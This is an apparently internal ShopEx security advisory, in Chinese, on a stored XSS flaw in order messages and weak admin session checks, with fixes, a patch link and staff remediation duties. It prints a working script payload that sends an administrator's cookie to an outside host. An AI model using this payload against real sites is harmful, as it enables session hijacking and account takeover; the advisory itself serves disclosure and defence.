


添加时间
 
2010-07-26
 
系统编号
 
SEC-0726-01
 
影响版本
 
ShopEx485-38669
 
漏洞危害
 
劫持正常管理员的会话，非法登录后台
 
 
漏洞原理
 
1）XSS
 
前台会员中心的订单留言输出没有过滤，注册用户购买商品后，进入会员中心，在订单留言中提交这样的留言内容来获取到管理员的cookie 
 
<script>document.write('<img width=0 height=0 src=http://www.remote.com/record.php?cookies='+document.cookie+' />');</script>
 
也可以简单提交
 
<script>alert('hi');</script>
 
这些js代码写入数据库或者输出到页面的时候都没有转义，可以在页面中正常执行，登录后台查看这样的留言，应该可以看到弹出框。
 
2）CSRF
 
在core/include/adminCore.php没有对客户端做验证。 
 
        }elseif($_COOKIE['SHOPEX_SID']){
            $this->sess_id = $_COOKIE['SHOPEX_SID'];
        }else{
 
代码仅判断$_COOKIE['SHOPEX_SID'])是否有值，而没有判断它是否是来自同一个浏览器，恶意用户可以用窃取来的'SHOPEX_SID'登录后台。
 
 
解决方案
 
1） XSS，用户的输入信息在入库前转义掉
2） CSRF，结合SESSION，在session中放置标识用户身份的字串，类似这样的：
 
$chk = @md5(
        $_SERVER['HTTP_ACCEPT_CHARSET'] . 
        $_SERVER['HTTP_ACCEPT_ENCODING'] .
        $_SERVER['HTTP_ACCEPT_LANGUAGE'] .
        $_SERVER['HTTP_USER_AGENT']);                                 
 
if (empty($_SESSION))
        $_SESSION['key'] = $chk;
else if ($_SESSION['key'] != $chk) 
        session_destroy();
 
……后续正常的代码
 
 
主线版本补丁：
 
http://downtcom.shopex.cn/update/sec100726-01-42355-45144.zip 
 
 
信息来源
 
http://nod32.5151shop.com/?p=860
 
 
注意事项
 
1）主线版本将在shopex485版本的7号补丁中集成该漏洞的补丁。绿保服务部门的同仁要及时给prima上的用户打上补丁。
2）平台部saas系统请自行检查在前台用户输入点是否有问题（留言，商品评论，商品咨询，订单留言，订单填写页备注，售后服务申请等），如有问题，请反馈到我处报备，修补方案自定
3）B2B平台操作方法同平台部。
4）大客户部将根据项目实际情况自行修改，如有技术疑问可以直接咨询企业开发部的陈磊，或者我也可以的 ：）
 
附:
 
XSS问题除了订单留言外，测试部的同事还发现其他点也存在同样输出未转义的问题，详细的点请看附件。

